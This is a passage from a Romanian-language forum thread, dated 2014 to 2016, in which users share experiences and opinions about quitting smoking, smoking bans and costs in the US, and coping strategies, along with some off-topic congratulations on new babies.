...ca l-ai lamurit la subiect pe Tony nu inseamna ca ai rezolvat si cu ceilalti co-nationali din alte "sate de roamani" de pretutindeni!

...io spre exemplu! cand am inceput sa "percep preturile la tigari in US" ...se vindeau cam la $4.50- $5 pe cartus
...faptul ca pretul tigarilor a crescut de-a lungul anilor a fost mai mult pe plan politic! ...dar in acelasi timp tre sa luam in consideratie si cresterea considerabila a salariilor! ...in asa fel ca si omu' de rand (chiar daca nu fumeaza) sa poata cumpara si eventual "o branza de burduf" ...dar in asa fel incat "balanta" taxelor sa atarne in favoarea unchiului! ...ceea ce nu e rau, dar poate prea voit "impusa" de activisti care "au si n-au" o motivatie medicala solida!

p.s. Olguta, chiar daca in unele ale mele comentarii vreau sa par "naiv" nu inseamna ca "pornesc la atac" impotriva cuiva! ...din dorinta de a ma da shef in "bucataria forumului" :ideea:
...recunosc ca DA! ...de multe ori am tendinta sa fiu carcotas sau evntual un alt "pompier voluntar" ...cu remarci considerate ironice" dar in limita regulamentului! :d:

Olga
14.02.2014, 23:44
... ca l-ai lamurit pe Tony nu inseamna ca ai rezolvat si cu ceilalti co-nationali

Oooops!!! observ ca nu prea esti sub influenta zilei de azi ... indragostita de primavara si de zumzetul albinelor.
Din punctul meu de vedere NU sintem egali, nu ne gandim si nu ne exprimam la fel. Sintem fiinte individuale si unice fiecare din noi cu alte caractere care nu se pot manipula dupa un sablon preferat de stiu eu cine: pompieri, paramedici, modelatori, auditori, circari, etc. Folosim diferite cuvinte la exprimare, nu cu toti folosim limba romana zilnic 24/24 si vocabularul este asa cum poate sa fie dar asta nu inseamna ca e motiv de exersat putere suprema precum in locuri de detentie. De obicei nu raspund la asemenea texte intr-o zi vesela sa stric cheful celor care se simt in culmea fericirii, las pe o zi noroasa, eu asa am fost crescuta, sa dam zilei ce i se cuvine.

Si acum incerc sa mai rezolv si cu restul forumistilor ce am omis.
A se lasa de fumat este pornit mereu de o conditie externa, fie financiara, profesionala sau personala.

Cea financiara loveste pe fiecare in buzunar indiferent cat castiga daca fumeaza mult si scump, exclud doctori, pompieri,
farmacisti, dentisti, chirurgi estetici, chimisti, etc., care in State castiga cateva sute de mii de dolari pe ani cel putin.

La majoritatea locurilor de munca in State nu se asigura medical persoanele fumatoare si nici familiile lor, care deja face o mare gaura in budgetul familiei si asta este un motiv serios dea se lasa de fumat.
In Arizona sint localitati unde nici pe strada n-ai voie sa fumezi si in masina ta cu geamurile inchise numai, altfel esti amendat.
Nici in curtea ta n-ai voie sa fumezi daca pe vecinii il dernjeaza fumul tau de tigara, au drrpt legal sa cheme politia sa fi amendat. In locuri publice fumatul este strict interzis!!! parcuri incluse, nici in fata magazinelor sau aeroport, scoala, sala de asteptare, etc.
Practic un fumator nu este tolerat si vazut cu ochi buni, i se atrage atentia sa plece mai incolo ca miroase urat si nimeni nu este obligat sa inhale de mana a doua fumul nimanui.
Sanatatea personala sau al celor din imediata familie care sint langa un fumator, este in mare risc. Prietenii nefumatori nu mai tolereaza fumul celui care nu vrea sa renunte la acest viciu.
Pan-la urma un fumator ajunge marginalizat si singuratic cu obiceiul care-l poseda deja mai rau decat un spirit rau. Isi pierde demnitatea si personalitatea ca traieste prin prisma tigarii, tabacul ii dicteaza viata, este un adict fara scapare.
Se mai pierde si o fiinta iubita care nu tolereaza tabacul, relatia se termina imediat daca nu se planifica schimbare in viata, si nu ma refer la mers in biserica de facut promisiuni in fata altarului la vre-o icoana sau statuie de lemn, sau de oferit bani la preot sa se roage cum au facut unii multi si cu alcool pe langa tigara.
Promisiunile n-au valoare, faptele vorbesc.
Fumul pune creierul omului in mare ceata, mai rau decat sa fie in plasa de paianjen de unde la fel nu exista scapare.

Cantecul "Hotel California" al grupului Eagles are o vorba de spus aici.

"Last thing I remember, I was running for the door,
I had to find the passage back to the place I was before,
"Relax," said the night man, "We are programmed to receive,
You can check out anytime you like... but you can never leave"

tonita
15.02.2014, 06:35
...Acolo e problema, daca fumezi una nu se pune dar te limitezi la una? Dupa ce am simtit iar placerea de a fuma am uitat ca de fapt ma lasasem...

Exact asa am tras-o si eu, din greu. M-am tot lasat, si iar m-am apucat, mai multi ani la rând. Am reusit sa devin nefumator doar în momentul în care a facut "clic" în cap.(nu pe cap;-)

.... Deci, am fost sau nu fumatoare adevarata? :)

Toate obiceiurile sint in creier. Schimbi obisnuinta, schimbi obiceiul, nu e usor, dar nici extrem de greu. Daca atunci cind vrei sa fumezi te indeletnicesti cu altceva, ceva placut, care sa te faca sa uiti, poate ajuta. E valabil pentru orice dependenta. De obicei ajuta si trasul puternic de aer in piept :) prea rar sintem atenti la propria respiratie si daca o facem corect, din abdomen, nu toracic, tot corpul se oxigeneaza mai bine, inclusiv creierul si asta e un mic exercitiu care te ajuta sa te constientizezi in prezent si nu in umbra dependentei.

Nu stiu daca esti fumatoare adevarata, qualia. As înclina sa cred ca esti fumatoare ocazionala, la fel ca Olga, dar nu bag mâna în foc!
Afirmatia la adresa Olgai a fost un pic provocativa. Dupa cum zici si tu toate obiceiurile sunt în creier.
Cat este de usor sau de greu pentru o anumita persoana sa renunte poate doar ea sa spuna si sa simta. Pentru unii obiceiul este atât de înradacinat încât renuntarea e foarte dureroasa. Sfaturile bineintentionate nu ajuta întotdeauna pentru ca se adreseaza doar ratiunii. Din fericire ratiunea nu poate controla tot ce se petrece în creier. "Sefu/Sefa mare" au luat în privinta asta o hotarâre foarte buna.
Mi-e foame, sete sau pofta de o tigara nu sunt cu usurinta supuse controlului. Un fumator "adevarat" va renunta foarte greu, e dependent...dar n-are rost sa mai bat apa-n piua...am vazut cu totii filme în care eroul drogat sufera torturile dezintoxicarii.

Am bolduit ceea ce mi se pare cel mai util lucru spus pâna acum pe topicul asta. Chapeau palaria!
Un fan adevarat!:)

FidelKatzo
17.02.2014, 05:28
In Arizona sint localitati unde nici pe strada n-ai voie sa fumezi si in masina ta cu geamurile inchise numai, altfel esti amendat.
Nici in curtea ta n-ai voie sa fumezi daca pe vecinii il dernjeaza fumul tau de tigara, au drrpt legal sa cheme politia sa fi amendat. In locuri publice fumatul este strict interzis!!! parcuri incluse, nici in fata magazinelor sau aeroport, scoala, sala de asteptare, etc.
Practic un fumator nu este tolerat si vazut cu ochi buni, i se atrage atentia sa plece mai incolo ca miroase urat si nimeni nu este obligat sa inhale de mana a doua fumul nimanui.
Sanatatea personala sau al celor din imediata familie care sint langa un fumator, este in mare risc. Prietenii nefumatori nu mai tolereaza fumul celui care nu vrea sa renunte la acest viciu.
Pan-la urma un fumator ajunge marginalizat si singuratic cu obiceiul care-l poseda deja mai rau decat un spirit rau. Isi pierde demnitatea si personalitatea ca traieste prin prisma tigarii, tabacul ii dicteaza viata, este un adict fara scapare.
Se mai pierde si o fiinta iubita care nu tolereaza tabacul, relatia se termina imediat daca nu se planifica schimbare in viata, si nu ma refer la mers in biserica de facut promisiuni in fata altarului la vre-o icoana sau statuie de lemn, sau de oferit bani la preot sa se roage cum au facut unii multi si cu alcool pe langa tigara.
Promisiunile n-au valoare, faptele vorbesc.
Fumul pune creierul omului in mare ceata, mai rau decat sa fie in plasa de paianjen de unde la fel nu exista scapare.

Cantecul "Hotel California" al grupului Eagles are o vorba de spus aici.

bine ca nu am emigrat la voi. ce ma faceam daca ma prindeau in desert ca fumez.? parca ma vad ascuns dupa un cactus cum cercetez cu fata speriata zarea,daca se ridica de undeva un nor de praf,sa nu fiu prins cu tigara aprinsa. aveti o emisiune interesanta despre case care se vand la licitatie in zona voastra. am ramas impresionat de varietatea de plante care cresc in curtile oamenilor.in Bragan se numeau ciulini,la voi ce cheama plante decorative..mi-au placut mult scorpionii micuti si rosiatici care trag la anumite plante.cred ca aveti in reflex controlatul asternuturilor inainte de culcare...

sorin
17.02.2014, 06:14
Poate mi-ar trebui o perioada mai lunga fara tigari sa ajung la performanta aia. Nu am trecut de maxim 2 luni si de fiecare data am zis ca daca fumez 1 nu se pune si s-a ales praful.

Acolo e problema, daca fumezi una nu se pune dar te limitezi la una? Dupa ce am simtit iar placerea de a fuma am uitat ca de fapt ma lasasem.

Ce inseamna fumatoare adevarata?

M-am lasat de fumat acum aprox 24 de ani, fara nici o problema si de atunci nu am mai fumat nici o tigare. Culmea, imi place fumul de tigare, pot sta fara probleme in prezenta fumatorilor, dar depinde totusi ce fumeaza.

M-am tot lasat, si iar m-am apucat, mai multi ani la rând. Am reusit sa devin nefumator doar în momentul în care a facut "clic" în cap.
Citind comentariile voastre, m-am hotarat sa testez si sa lamuresc acest mister, al lasatului cu adevarat de fumat. Acestea fiind spuse, acum cateva zile, dupa 6 luni fara fumat, am fumat o tigara, una singura. Dupa aia, am asteptat sa turbez, sa ma urc pe pereti, sa plang, sa-mi dau palme, dar...nimic, sunt bine si n-am mai fumat de atunci. Concluzia este ca nu esti gata sa devii nefumator pana nu te-ai pregatit mental. Degeaba cheltui bani pe gume speciale de mestecat, chestii de lipit pe mana (patches), etc., daca stai tot timpul cu frica de a nu fuma vreodata vreo tigara dupa 3, 5, sau 10 ani ca se duce totul de rapa. Poti spune ca te-ai lasat cu adevarat de fumat cand poti fuma o tigara oricand, fara frica, iar partea subliniata o puteti trece la expresii celebre. :cool:

livia
17.02.2014, 06:58
Ce te-a facut sa o aprinzi? Pofta de a fuma sau doar ai facut un test de vointa?

sorin
17.02.2014, 07:03
Citind comentariile voastre, m-am hotarat sa testez si sa lamuresc acest mister, al lasatului cu adevarat de fumat.

Ce te-a facut sa o aprinzi? Pofta de a fuma sau doar ai facut un test de vointa?
Asa cum spuneam, doar un test. Daca era pofta de a fuma (pofta asta apare poate chiar si zilnic, dar dispare in cateva secunde impunandu-ti acest lucru) si careia nu as fi putur rezista, de ce as fi asteptat 6 luni?

fillimon
11.01.2016, 08:00
De lasat e foarte greu sa te lasi. Stiu asta pe propria piele. Cred ca am incercat pana acum sa ma las de zeci de ori, dar fara succes. Am reusit, e adevarat sa le mai reduc intr-o anumita perioada, dar apoi am revenit la numarul zilnic de tigari.

sorin
11.01.2016, 08:11
Te lasi brusc si fara pregatiri prealabile. Dupa cateva zile dificile, totul e in regula. Depinde de mesajele trimise creierului, asta e cheia succesului.

Bmatei
03.02.2016, 04:26
Eu am mancat in fiecare zi cate 10 bomboane Kopiko si asa m-am lasat si de cafea si de tigari, inlocuind un obicei cu altul...

AlexandruNicolae
15.02.2016, 01:43
Mi-am instalat o aplicație pe iPhone ca să simt și eu că am realizat ceva. Îmi zice câte țigări n-am fumat, câte zile au trecut de când m-am lăsat și câți bani n-am cheltuit aiurea :) Se numeste Smoke Free

biliboaca
02.03.2016, 02:47
La mine nimic nu tine. Am fumat si pe timpul sarcinii. Am Incercat sa ma las. Primele 6 luni am rezistat cu 3 tigari pe zi. Dupa am sarit direct la pachet. Cred ca sunt un caz irecuperabil. Acu nu ne mai lasa astia sa fumam pe niciunde. Sunt afectata maxim.

VanDerGigi
02.03.2016, 03:16
Oh ai copilas Bili, felicitari!
Ce varsta? Baiat sau fata?

Tim
02.03.2016, 05:47
Nu m-am lasat si nu ma las, pina la ora asta 13,30 (Romania) am fumat o tigara la cafea pe la ora 10, pina deseara inca una dar doar daca beau o bere sau alceva, daca nu beau nu fumez, adica nu fumez pe uscat. Ieri au fost doua tigari, alalta ieri una si cam tot asa de 20 de ani.
Sa beau o cafea si sa nu fumez - prefer sa renunt la cafea.

biliboaca
02.03.2016, 06:53
Oh ai copilas Bili, felicitari!
Ce varsta? Baiat sau fata?

Multam. Fetita. Avem 9 luni... si zicem tatatatatata. ..

livia
02.03.2016, 10:44
Sa va traiasca, sa creasca mare si sa va aduca numai bucurii!

Loniia
02.03.2016, 11:21
Multam. Fetita. Avem 9 luni... si zicem tatatatatata. ..

biliboaco asta da surpriza!Sa va traiasca odorul ! sa fie sanatoasa sa va aduca multe bucurii!

VanDerGigi
02.03.2016, 11:32
Bravo Bili sa va traiasca! Acum suntem si camarazi de schimbat scutece.

biliboaca
02.03.2016, 11:53
Multam tare mult dragilor!
Jiji, ai si tu un bebelica? cat are? fetita, baietel?

VanDerGigi
02.03.2016, 12:56
Bili, io cand m-am apucat nu m-am mai oprit.
Am doi, fetita de 2 ani si baietel de 7 luni.

biliboaca
02.03.2016, 23:33
Bravo domnule! Sa iti aduca numai bine. Mi-ar placea si mie doi dar mai vedem.

vilisonu
09.12.2016, 06:09
Pentru renuntarea la fumat exista foarte multe produse care ajuta la stoparea in totalitate a fumatului.

toni41
09.12.2016, 07:45
Pai n-am platit destul pentru tigari?! De ce sa mai platesc si pentru produse care sa ma scape de fumat? Ajunge sa vreau! Stiu oameni care au scapat de pe o zi pe alta de fumat, chiar daca a fost greu.